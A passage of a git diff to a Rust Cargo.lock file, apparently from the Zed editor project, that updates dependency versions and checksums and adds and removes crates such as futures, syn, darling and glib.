"ea5440792eb2b5ba0a0976df371b9f94031bd853ae56f389de610bca7128a7cb" dependencies = [ "cranelift-codegen", "log", @@ -4042,15 +3983,15 @@ dependencies = [ [[package]] name = "cranelift-isle" -version = "0.120.2" +version = "0.123.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "711baa4e3432d4129295b39ec2b4040cc1b558874ba0a37d08e832e857db7285" +checksum = "1e5c05fab6fce38d729088f3fa1060eaa1ad54eefd473588887205ed2ab2f79e" [[package]] name = "cranelift-native" -version = "0.120.2" +version = "0.123.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "41c83e8666e3bcc5ffeaf6f01f356f0e1f9dcd69ce5511a1efd7ca5722001a3f" +checksum = "9c9a0607a028edf5ba5bba7e7cf5ca1b7f0a030e3ae84dcd401e8b9b05192280" dependencies = [ "cranelift-codegen", "libc", @@ -4059,9 +4000,9 @@ dependencies = [ [[package]] name = "cranelift-srcgen" -version = "0.120.2" +version = "0.123.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "02e3f4d783a55c64266d17dc67d2708852235732a100fc40dd9f1051adc64d7b" +checksum = "cb0f2da72eb2472aaac6cfba4e785af42b1f2d82f5155f30c9c30e8cce351e17" [[package]] name = "crash-context" @@ -4091,14 +4032,13 @@ dependencies = [ name = "crashes" version = "0.1.0" dependencies = [ - "anyhow", - "bincode", "cfg-if", "crash-handler", - "futures 0.3.31", + "futures 0.3.32", "log", "mach2 0.5.0", "minidumper", + "parking_lot", "paths", "release_channel", "serde", @@ -4151,12 +4091,8 @@ name = "credentials_provider" version = "0.1.0" dependencies = [ "anyhow", - "futures 0.3.31", "gpui", - "paths", - "release_channel", "serde", - "serde_json", ] [[package]] @@ -4309,7 +4245,21 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "13b588ba4ac1a99f7f2964d24b3d896ddc6bf847ee3855dbd4366f058cfcd331" dependencies = [ "quote", - "syn 2.0.106", + "syn 2.0.117", +] + +[[package]] +name = "csv_preview" +version = "0.1.0" +dependencies = [ + "anyhow", + "editor", + "feature_flags", + "gpui", + "log", + "text", + "ui", + "workspace", ] [[package]] @@ -4367,12 +4317,12 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "d74b6bcf49ebbd91f1b1875b706ea46545032a14003b5557b7dfa4bbeba6766e" dependencies = [ "cc", - "codespan-reporting 0.13.0", + "codespan-reporting", "indexmap", "proc-macro2", "quote", "scratch", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -4382,11 +4332,11 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "94ca2ad69673c4b35585edfa379617ac364bccd0ba0adf319811ba3a74ffa48a" dependencies = [ "clap", - "codespan-reporting 0.13.0", + "codespan-reporting", "indexmap", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -4404,7 +4354,7 @@ dependencies = [ "indexmap", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -4420,7 +4370,7 @@ dependencies = [ "collections", "dap-types", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "http_client", "language", @@ -4438,8 +4388,6 @@ dependencies = [ "smol", "task", "telemetry", - "tree-sitter", - "tree-sitter-go", "util", "zlog", ] @@ -4464,7 +4412,7 @@ dependencies = [ "dap", "dotenvy", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "http_client", "json_dotpath", @@ -4486,22 +4434,46 @@ version = "0.20.11" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "fc7f46116c46ff9ab3eb1597a45688b6715c6e628b5c133e288e709a29bcb4ee" dependencies = [ - "darling_core", - "darling_macro", + "darling_core 0.20.11", + "darling_macro 0.20.11", +] + +[[package]] +name = "darling" +version = "0.21.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9cdf337090841a411e2a7f3deb9187445851f91b309c0c0a29e05f74a00a48c0" +dependencies = [ + "darling_core 0.21.3", + "darling_macro 0.21.3", +] + +[[package]] +name = "darling_core" +version = "0.20.11" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0d00b9596d185e565c2207a0b01f8bd1a135483d02d9b7b0a54b11da8d53412e" +dependencies = [ + "fnv", + "ident_case", + "proc-macro2", + "quote", + "strsim", + "syn 2.0.117", ] [[package]] name = "darling_core" -version = "0.20.11" +version = "0.21.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0d00b9596d185e565c2207a0b01f8bd1a135483d02d9b7b0a54b11da8d53412e" +checksum = "1247195ecd7e3c85f83c8d2a366e4210d588e802133e1e355180a9870b517ea4" dependencies = [ "fnv", "ident_case", "proc-macro2", "quote", "strsim", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -4510,9 +4482,20 @@ version = "0.20.11" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "fc34b93ccb385b40dc71c6fceac4b2ad23662c7eeb248cf10d529b7e055b6ead" dependencies = [ - "darling_core", + "darling_core 0.20.11", + "quote", + "syn 2.0.117", +] + +[[package]] +name = "darling_macro" +version = "0.21.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d38308df82d1080de0afee5d069fa14b0326a88c14f15c5ccda35b4a6c414c81" +dependencies = [ + "darling_core 0.21.3", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -4554,6 +4537,7 @@ dependencies = [ "anyhow", "gpui", "indoc", + "inventory", "log", "paths", "release_channel", @@ -4562,6 +4546,7 @@ dependencies = [ "sqlez_macros", "tempfile", "util", + "uuid", "zed_env_vars", ] @@ -4598,7 +4583,7 @@ dependencies = [ "anyhow", "dap", "editor", - "futures 0.3.31", + "futures 0.3.32", "gpui", "project", "serde_json", @@ -4625,7 +4610,7 @@ dependencies = [ "editor", "feature_flags", "file_icons", - "futures 0.3.31", + "futures 0.3.32", "fuzzy", "gpui", "hex", @@ -4653,6 +4638,7 @@ dependencies = [ "terminal_view", "text", "theme", + "theme_settings", "tree-sitter", "tree-sitter-go", "tree-sitter-json", @@ -4679,7 +4665,7 @@ name = "deepseek" version = "0.1.0" dependencies = [ "anyhow", - "futures 0.3.31", + "futures 0.3.32", "http_client", "schemars", "serde", @@ -4744,40 +4730,29 @@ checksum = "1e567bd82dcff979e4b03460c307b3cdc9e96fde3d73bed1496d2bc75d9dd62a" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", -] - -[[package]] -name = "derive_more" -version = "0.99.20" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6edb4b64a43d977b8e99788fe3a04d483834fba1215a7e02caa415b626497f7f" -dependencies = [ - "convert_case 0.4.0", - "proc-macro2", - "quote", - "rustc_version", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] name = "derive_more" -version = "2.0.1" +version = "2.1.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "093242cf7570c207c83073cf82f79706fe7b8317e98620a47d5be7c3d8497678" +checksum = "d751e9e49156b02b44f9c1815bcb94b984cdcc4396ecc32521c739452808b134" dependencies = [ "derive_more-impl", ] [[package]] name = "derive_more-impl" -version = "2.0.1" +version = "2.1.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "bda628edc44c4bb645fbe0f758797143e4e07926f7ebf4e9bdfbd3d2ce621df3" +checksum = "799a97264921d8623a957f6c3b9011f3b5492f557bbb7a5a19b7fa6d06ba8dcb" dependencies = [ + "convert_case 0.10.0", "proc-macro2", "quote", - "syn 2.0.106", + "rustc_version", + "syn 2.0.117", "unicode-xid", ] @@ -4787,43 +4762,46 @@ version = "0.1.0" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] name = "derive_setters" -version = "0.1.8" +version = "0.1.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ae5c625eda104c228c06ecaf988d1c60e542176bd7a490e60eeda3493244c0c9" +checksum = "b7e6f6fa1f03c14ae082120b84b3c7fbd7b8588d924cf2d7c3daf9afd49df8b9" dependencies = [ - "darling", + "darling 0.21.3", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] name = "dev_container" version = "0.1.0" dependencies = [ + "async-tar", + "async-trait", + "env_logger 0.11.8", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "http 1.3.1", "http_client", "log", "menu", - "node_runtime", "paths", "picker", "project", "serde", "serde_json", + "serde_json_lenient", "settings", - "smol", - "theme", + "shlex", "ui", "util", + "walkdir", "workspace", "worktree", ] @@ -4833,7 +4811,6 @@ name = "diagnostics" version = "0.1.0" dependencies = [ "anyhow", - "client", "collections", "component", "ctor", @@ -4853,6 +4830,7 @@ dependencies = [ "settings", "text", "theme", + "theme_settings", "ui", "unindent", "util", @@ -4961,7 +4939,7 @@ dependencies = [ "libc", "option-ext", "redox_users 0.5.2", - "windows-sys 0.59.0", + "windows-sys 0.61.2", ] [[package]] @@ -4972,11 +4950,13 @@ checksum = "bd0c93bb4b0c6d9b77f4435b0ae98c24d17f1c45b2ff844c6151a07256ca923b" [[package]] name = "dispatch2" -version = "0.3.0" +version = "0.3.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "89a09f22a6c6069a18470eb92d2298acf25463f14256d24778e1230d789a2aec" +checksum = "1e0e367e4e7da84520dedcac1901e4da967309406d1e51017ae1abfb97adbd38" dependencies = [ "bitflags 2.10.0", + "block2", + "libc", "objc2", ] @@ -4988,7 +4968,7 @@ checksum = "97369cbbc041bc366949bc74d34658d6cda5621039731c6310521892a3a20ae0" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -5051,7 +5031,7 @@ dependencies = [ "proc-macro2", "quote", "strum 0.27.2", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -5179,8 +5159,6 @@ version = "0.1.0" dependencies = [ "ai_onboarding", "anyhow", - "arrayvec", - "brotli", "buffer_diff", "client", "clock", @@ -5189,14 +5167,16 @@ dependencies = [ "collections", "copilot", "copilot_ui", + "credentials_provider", "ctor", "db", "edit_prediction_context", "edit_prediction_types", "feature_flags", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", + "heapless", "indoc", "itertools 0.14.0", "language", @@ -5224,13 +5204,13 @@ dependencies = [ "thiserror 2.0.17", "time", "toml 0.8.23", - "tree-sitter-rust", "ui", "util", "uuid", "workspace", "worktree", "zed_actions", + "zed_credentials_provider", "zeta_prompt", "zlog", "zstd", @@ -5247,13 +5227,15 @@ dependencies = [ "client", "cloud_llm_client", "collections", + "criterion", + "db", "debug_adapter_extension", "dirs 4.0.0", "edit_prediction", "extension", "flate2", "fs", - "futures 0.3.31", + "futures 0.3.32", "gaoya", "gpui", "gpui_platform", @@ -5305,7 +5287,7 @@ dependencies = [ "clock", "collections", "env_logger 0.11.8", - "futures 0.3.31", + "futures 0.3.32", "gpui", "indoc", "language", @@ -5322,7 +5304,6 @@ dependencies = [ "tree-sitter", "util", "zeta_prompt", - "zlog", ] [[package]] @@ -5343,7 +5324,6 @@ dependencies = [ "anyhow", "buffer_diff", "client", - "clock", "cloud_llm_client", "codestral", "collections", @@ -5356,34 +5336,27 @@ dependencies = [ "editor", "feature_flags", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "indoc", "language", - "language_model", - "lsp", "markdown", "menu", "multi_buffer", "paths", - "pretty_assertions", "project", "regex", - "release_channel", - "semver", - "serde_json", "settings", - "supermaven", "telemetry", "text", "theme", + "theme_settings", "time", "ui", "util", "workspace", "zed_actions", "zeta_prompt", - "zlog", ] [[package]] @@ -5408,11 +5381,10 @@ dependencies = [ "feature_flags", "file_icons", "fs", - "futures 0.3.31", + "futures 0.3.32", "fuzzy", "git", "gpui", - "http_client", "indoc", "itertools 0.14.0", "language", @@ -5427,6 +5399,8 @@ dependencies = [ "parking_lot", "pretty_assertions", "project", + "proptest", + "proptest-derive", "rand 0.9.2", "regex", "release_channel", @@ -5443,9 +5417,9 @@ dependencies = [ "sum_tree", "task", "telemetry", - "tempfile", "text", "theme", + "theme_settings", "time", "tracing", "tree-sitter-bash", @@ -5603,7 +5577,7 @@ dependencies = [ "heck 0.5.0", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -5624,7 +5598,7 @@ checksum = "67c78a4d8fdf9953a5c9d458f9efe940fd97a0cab0941c075a813ac594733827" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -5663,6 +5637,13 @@ dependencies = [ "log", ] +[[package]] +name = "env_var" +version = "0.1.0" +dependencies = [ + "gpui", +] + [[package]] name = "envy" version = "0.4.2" @@ -5689,7 +5670,7 @@ checksum = "44f23cf4b44bfce11a86ace86f8a73ffdec849c9fd00a386a53d278bd9e81fb3" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -5727,7 +5708,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "39cab71617ae0d63f51a36d69f866391735b51691dbda63cf6f96d042b63efeb" dependencies = [ "libc", - "windows-sys 0.59.0", + "windows-sys 0.61.2", ] [[package]] @@ -5740,6 +5721,15 @@ dependencies = [ "libc", ] +[[package]] +name = "error-graph" +version = "0.1.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9b920e777967421aa5f9bf34f842c0ab6ba19b3bdb4a082946093860f5858879" +dependencies = [ + "serde", +] + [[package]] name = "etagere" version = "0.2.15" @@ -5788,58 +5778,44 @@ dependencies = [ ] [[package]] -name = "eval" +name = "eval_cli" version = "0.1.0" dependencies = [ "acp_thread", "agent", "agent-client-protocol", - "agent_settings", "agent_ui", "anyhow", - "async-trait", - "buffer_diff", - "chrono", "clap", "client", - "collections", + "ctrlc", + "db", "debug_adapter_extension", - "dirs 4.0.0", - "dotenvy", "env_logger 0.11.8", "extension", + "feature_flags", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "gpui_platform", "gpui_tokio", - "handlebars 4.5.0", "language", "language_extension", "language_model", "language_models", "languages", - "markdown", "node_runtime", - "pathdiff", "paths", - "pretty_assertions", "project", "prompt_store", - "rand 0.9.2", - "regex", "release_channel", "reqwest_client", "serde", "serde_json", "settings", "shellexpand 2.1.2", - "telemetry", "terminal_view", - "toml 0.8.23", - "unindent", "util", - "uuid", "watch", ] @@ -5929,7 +5905,7 @@ dependencies = [ "collections", "dap", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "heck 0.5.0", "http_client", @@ -5971,8 +5947,10 @@ dependencies = [ "serde", "serde_json", "serde_json_lenient", + "settings_content", "snippet_provider", - "theme", + "task", + "theme_settings", "tokio", "toml 0.8.23", "tree-sitter", @@ -5995,7 +5973,7 @@ dependencies = [ "dap", "extension", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "gpui_tokio", "http_client", @@ -6008,7 +5986,6 @@ dependencies = [ "parking_lot", "paths", "project", - "rand 0.9.2", "release_channel", "remote", "reqwest_client", @@ -6022,6 +5999,7 @@ dependencies = [ "tempfile", "theme", "theme_extension", + "theme_settings", "toml 0.8.23", "tracing", "url", @@ -6060,7 +6038,7 @@ dependencies = [ "smallvec", "strum 0.27.2", "telemetry", - "theme", + "theme_settings", "ui", "util", "vim_mode_setting", @@ -6068,6 +6046,12 @@ dependencies = [ "zed_actions", ] +[[package]] +name = "failspot" +version = "0.2.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c942e64b20ecd39933d5ff938ca4fdb6ef0d298cc3855b231179a5ef0b24948d" + [[package]] name = "fallible-iterator" version = "0.3.0" @@ -6080,7 +6064,18 @@ version = "0.16.2" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "998b056554fbe42e03ae0e152895cd1a7e1002aec800fdc6635d20270260c46f" dependencies = [ - "bit-set", + "bit-set 0.8.0", + "regex-automata", + "regex-syntax", +] + +[[package]] +name = "fancy-regex" +version = "0.17.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "72cf461f865c862bb7dc573f643dd6a2b6842f7c30b07882b56bd148cc2761b8" +dependencies = [ + "bit-set 0.8.0", "regex-automata", "regex-syntax", ] @@ -6123,7 +6118,7 @@ checksum = "a0aca10fb742cb43f9e7bb8467c91aa9bcb8e3ffbc6a6f7389bb93ffc920577d" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -6150,7 +6145,6 @@ dependencies = [ name = "feature_flags" version = "0.1.0" dependencies = [ - "futures 0.3.31", "gpui", ] @@ -6158,7 +6152,6 @@ dependencies = [ name = "feedback" version = "0.1.0" dependencies = [ - "editor", "gpui", "system_specs", "urlencoding", @@ -6182,25 +6175,27 @@ name = "file_finder" version = "0.1.0" dependencies = [ "anyhow", + "channel", + "client", "collections", "ctor", "editor", "file_icons", - "futures 0.3.31", + "futures 0.3.32", "fuzzy", "gpui", - "language", "menu", "open_path_prompt", "picker", "pretty_assertions", "project", "project_panel", + "remote_connection", "serde", "serde_json", "settings", - "text", "theme", + "theme_settings", "ui", "util", "workspace", @@ -6422,7 +6417,7 @@ checksum = "1a5c6c585bc94aaf2c7b51dd4c2ba22680844aba4c687be581871a6f518c5742" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -6486,8 +6481,9 @@ dependencies = [ "async-trait", "cocoa 0.26.0", "collections", + "dunce", "fs", - "futures 0.3.31", + "futures 0.3.32", "git", "gpui", "ignore", @@ -6585,9 +6581,9 @@ checksum = "3a471a38ef8ed83cd6e40aa59c1ffe17db6855c18e3604d9c4ed8c08ebc28678" [[package]] name = "futures" -version = "0.3.31" +version = "0.3.32" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "65bc07b1a8bc7c85c5f2e110c476c7389b4554ba72af57d8445ea63a576b0876" +checksum = "8b147ee9d1f6d097cef9ce628cd2ee62288d963e16fb287bd9286455b241382d" dependencies = [ "futures-channel", "futures-core", @@ -6600,9 +6596,9 @@ dependencies = [ [[package]] name = "futures-channel" -version = "0.3.31" +version = "0.3.32" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2dff15bf788c671c1934e366d07e30c1814a8ef514e1af724a602e8a2fbe1b10" +checksum = "07bbe89c50d7a535e539b8c17bc0b49bdb77747034daa8087407d655f3f7cc1d" dependencies = [ "futures-core", "futures-sink", @@ -6623,15 +6619,15 @@ dependencies = [ [[package]] name = "futures-core" -version = "0.3.31" +version = "0.3.32" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "05f29059c0c2090612e8d742178b0580d2dc940c837851ad723096f87af6663e" +checksum = "7e3450815272ef58cec6d564423f6e755e25379b217b0bc688e295ba24df6b1d" [[package]] name = "futures-executor" -version = "0.3.31" +version = "0.3.32" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1e28d1d997f585e54aebc3f97d39e72338912123a67330d723fdbb564d646c9f" +checksum = "baf29c38818342a3b26b5b923639e7b1f4a61fc5e76102d4b1981c6dc7a7579d" dependencies = [ "futures-core", "futures-task", @@ -6651,9 +6647,9 @@ dependencies = [ [[package]] name = "futures-io" -version = "0.3.31" +version = "0.3.32" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9e5c1b78ca4aae1ac06c48a526a655760685149f0d465d21f37abfe57ce075c6" +checksum = "cecba35d7ad927e23624b22ad55235f2239cfa44fd10428eecbeba6d6a717718" [[package]] name = "futures-lite" @@ -6685,32 +6681,32 @@ dependencies = [ [[package]] name = "futures-macro" -version = "0.3.31" +version = "0.3.32" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "162ee34ebcb7c64a8abebc059ce0fee27c2262618d7b60ed8faf72fef13c3650" +checksum = "e835b70203e41293343137df5c0664546da5745f82ec9b84d40be8336958447b" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] name = "futures-sink" -version = "0.3.31" +version = "0.3.32" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e575fab7d1e0dcb8d0c7bcf9a63ee213816ab51902e6d244a95819acacf1d4f7" +checksum = "c39754e157331b013978ec91992bde1ac089843443c49cbc7f46150b0fad0893" [[package]] name = "futures-task" -version = "0.3.31" +version = "0.3.32" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f90f7dce0722e95104fcb095585910c0977252f286e354b5e3bd38902cd99988" +checksum = "037711b3d59c33004d3856fbdc83b99d4ff37a24768fa1be9ce3538a1cde4393" [[package]] name = "futures-util" -version = "0.3.31" +version = "0.3.32" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9fa08315bb612088cc391249efdc3bc77536f16c91f6cf495e6fbe85b20a4a81" +checksum = "389ca41296e6190b48053de0321d02a77f32f8a5d2461dd38762c0593805c6d6" dependencies = [ "futures 0.1.31", "futures-channel", @@ -6719,9 +6715,9 @@ dependencies = [ "futures-macro", "futures-sink", "futures-task", + "libc", "memchr", "pin-project-lite", - "pin-utils", "slab", "tokio-io", ] @@ -7081,10 +7077,10 @@ dependencies = [ [[package]] name = "gh-workflow" version = "0.8.0" -source = "git+https://github.com/zed-industries/gh-workflow?rev=c9eac0ed361583e1072860d96776fa52775b82ac#c9eac0ed361583e1072860d96776fa52775b82ac" +source = "git+https://github.com/zed-industries/gh-workflow?rev=37f3c0575d379c218a9c455ee67585184e40d43f#37f3c0575d379c218a9c455ee67585184e40d43f" dependencies = [ "async-trait", - "derive_more 2.0.1", + "derive_more", "derive_setters", "gh-workflow-macros", "indexmap", @@ -7092,17 +7088,17 @@ dependencies = [ "serde", "serde_json", "serde_yaml", - "strum_macros", + "strum_macros 0.27.2", ] [[package]] name = "gh-workflow-macros" version = "0.8.0" -source = "git+https://github.com/zed-industries/gh-workflow?rev=c9eac0ed361583e1072860d96776fa52775b82ac#c9eac0ed361583e1072860d96776fa52775b82ac" +source = "git+https://github.com/zed-industries/gh-workflow?rev=37f3c0575d379c218a9c455ee67585184e40d43f#37f3c0575d379c218a9c455ee67585184e40d43f" dependencies = [ "heck 0.5.0", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -7117,9 +7113,9 @@ dependencies = [ [[package]] name = "gimli" -version = "0.31.1" +version = "0.32.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "07e28edb80900c19c28f1072f2e8aeca7fa06b23cd4169cefe1af5aa3260783f" +checksum = "e629b9b98ef3dd8afe6ca2bd0f89306cec16d43d907889945bc5d6687f2f13c7" dependencies = [ "fallible-iterator", "indexmap", @@ -7127,10 +7123,17 @@ dependencies = [ ] [[package]] -name = "gimli" -version = "0.32.3" +name = "gio-sys" +version = "0.21.5" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e629b9b98ef3dd8afe6ca2bd0f89306cec16d43d907889945bc5d6687f2f13c7" +checksum = "0071fe88dba8e40086c8ff9bbb62622999f49628344b1d1bf490a48a29d80f22" +dependencies = [ + "glib-sys", + "gobject-sys", + "libc", + "system-deps 7.0.7", + "windows-sys 0.61.2", +] [[package]] name = "git" @@ -7140,8 +7143,8 @@ dependencies = [ "askpass", "async-trait", "collections", - "derive_more 0.99.20", - "futures 0.3.31", + "derive_more", + "futures 0.3.32", "git2", "gpui", "http_client", @@ -7162,7 +7165,6 @@ dependencies = [ "text", "thiserror 2.0.17", "time", - "unindent", "url", "urlencoding", "util", @@ -7191,7 +7193,6 @@ dependencies = [ "collections", "db", "editor", - "feature_flags", "fs", "git", "git_ui", @@ -7200,11 +7201,14 @@ dependencies = [ "menu", "project", "rand 0.9.2", - "recent_projects", + "remote_connection", + "search", "serde_json", "settings", "smallvec", + "smol", "theme", + "theme_settings", "time", "ui", "workspace", @@ -7216,7 +7220,7 @@ version = "0.1.0" dependencies = [ "anyhow", "async-trait", - "futures 0.3.31", + "futures 0.3.32", "git", "gpui", "http_client", @@ -7241,17 +7245,15 @@ dependencies = [ "askpass", "buffer_diff", "call", - "cloud_llm_client", "collections", "component", "ctor", "db", "editor", - "feature_flags", - "futures 0.3.31", + "file_icons", + "futures 0.3.32", "fuzzy", "git", - "git_hosting_providers", "gpui", "indoc", "itertools 0.14.0", @@ -7268,6 +7270,7 @@ dependencies = [ "pretty_assertions", "project", "prompt_store", + "proto", "rand 0.9.2", "remote", "remote_connection", @@ -7280,6 +7283,7 @@ dependencies = [ "strum 0.27.2", "telemetry", "theme", + "theme_settings", "time", "time_format", "tracing", @@ -7307,6 +7311,50 @@ dependencies = [ "xml-rs", ] +[[package]] +name = "glib" +version = "0.21.5" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "16de123c2e6c90ce3b573b7330de19be649080ec612033d397d72da265f1bd8b" +dependencies = [ + "bitflags 2.10.0", + "futures-channel", + "futures-core", + "futures-executor", + "futures-task", + "futures-util", + "gio-sys", + "glib-macros", + "glib-sys", + "gobject-sys", + "libc", + "memchr", + "smallvec", +] + +[[package]] +name = "glib-macros" +version = "0.21.5" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cf59b675301228a696fe01c3073974643365080a76cc3ed5bc2cbc466ad87f17" +dependencies = [ + "heck 0.5.0", + "proc-macro-crate", + "proc-macro2", + "quote", + "syn 2.0.117", +] + +[[package]] +name = "glib-sys" +version = "0.21.5" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2d95e1a3a19ae464a7286e14af9a90683c64d70c02532d88d87ce95056af3e6c" +dependencies = [ + "libc", + "system-deps 7.0.7", +] + [[package]] name = "glob" version = "0.3.3" @@ -7340,9 +7388,9 @@ dependencies = [ [[package]] name = "glow" -version = "0.16.0" +version = "0.17.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c5e5ea60d70410161c8bf5da3fdfeaa1c72ed2c15f8bbb9d19fe3a4fad085f08" +checksum = "29038e1c483364cc6bb3cf78feee1816002e127c331a1eec55a4d202b9e1adb5" dependencies = [ "js-sys", "slotmap", @@ -7368,6 +7416,7 @@ dependencies = [ "indoc", "language", "menu", + "multi_buffer", "project", "rope", "serde", @@ -7375,18 +7424,27 @@ dependencies = [ "settings", "text", "theme", - "tree-sitter-rust", - "tree-sitter-typescript", "ui", "util", "workspace", ] +[[package]] +name = "gobject-sys" +version = "0.21.5" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2dca35da0d19a18f4575f3cb99fe1c9e029a2941af5662f326f738a21edaf294" +dependencies = [ + "glib-sys", + "libc", + "system-deps 7.0.7", +] + [[package]] name = "goblin" -version = "0.8.2" +version = "0.9.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1b363a30c165f666402fe6a3024d3bec7ebc898f96a4a23bd1c99f8dbf3f4f47" +checksum = "daa0a64d21a7eb230583b4c5f4e23b7e4e57974f96620f42a7e75e08ae66d745" dependencies = [ "log", "plain", @@ -7398,7 +7456,7 @@ name = "google_ai" version = "0.1.0" dependencies = [ "anyhow", - "futures 0.3.31", + "futures 0.3.32", "http_client", "schemars", "serde", @@ -7454,7 +7512,6 @@ dependencies = [ "block", "cbindgen", "chrono", - "circular-buffer", "cocoa 0.26.0", "cocoa-foundation 0.2.0", "collections", @@ -7464,17 +7521,18 @@ dependencies = [ "core-text", "core-video", "ctor", - "derive_more 0.99.20", + "derive_more", "embed-resource", "env_logger 0.11.8", "etagere", "foreign-types 0.5.0", - "futures 0.3.31", + "futures 0.3.32", "futures-concurrency", "getrandom 0.3.4", "gpui_macros", "gpui_platform", "gpui_util", + "gpui_web", "http_client", "image", "inventory", @@ -7484,7 +7542,7 @@ dependencies = [ "mach2 0.5.0", "media", "metal", - "naga", + "naga 29.0.0 (registry+https://github.com/rust-lang/crates.io-index)", "num_cpus", "objc", "objc2", @@ -7495,11 +7553,12 @@ dependencies = [ "pin-project", "pollster 0.4.0", "postage", - "pretty_assertions", "profiling", + "proptest", "rand 0.9.2", "raw-window-handle", "refineable", + "regex", "reqwest_client", "resvg", "scheduler", @@ -7515,6 +7574,7 @@ dependencies = [ "sum_tree", "taffy", "thiserror 2.0.17", + "ttf-parser 0.25.1", "unicode-segmentation", "url", "usvg", @@ -7541,7 +7601,7 @@ dependencies = [ "calloop-wayland-source", "collections", "filedescriptor", - "futures 0.3.31", + "futures 0.3.32", "gpui", "gpui_wgpu", "http_client", @@ -7581,7 +7641,6 @@ version = "0.1.0" dependencies = [ "anyhow", "async-task", - "bindgen 0.71.1", "block", "cbindgen", "cocoa 0.26.0", @@ -7592,10 +7651,11 @@ dependencies = [ "core-text", "core-video", "ctor", - "derive_more 0.99.20", + "derive_more", + "dispatch2", "etagere", "foreign-types 0.5.0", - "futures 0.3.31", + "futures 0.3.32", "gpui", "image", "itertools 0.14.0", @@ -7605,6 +7665,7 @@ dependencies = [ "media", "metal", "objc", + "objc2-app-kit", "parking_lot", "pathfinder_geometry", "raw-window-handle", @@ -7624,7 +7685,7 @@ dependencies = [ "heck 0.5.0", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -7663,9 +7724,10 @@ version = "0.1.0" dependencies = [ "anyhow", "console_error_panic_hook", - "futures 0.3.31", + "futures 0.3.32", "gpui", "gpui_wgpu", + "http_client", "js-sys", "log", "parking_lot", @@ -7713,7 +7775,7 @@ dependencies = [ "anyhow", "collections", "etagere", - "futures 0.3.31", + "futures 0.3.32", "gpui", "image", "itertools 0.14.0", @@ -7731,6 +7793,35 @@ dependencies = [ "zed-scap", ] +[[package]] +name = "grammars" +version = "0.1.0" +dependencies = [ + "anyhow", + "language_core", + "rust-embed", + "toml 0.8.23", + "tree-sitter", + "tree-sitter-bash", + "tree-sitter-c", + "tree-sitter-cpp", + "tree-sitter-css", + "tree-sitter-diff", + "tree-sitter-gitcommit", + "tree-sitter-go", + 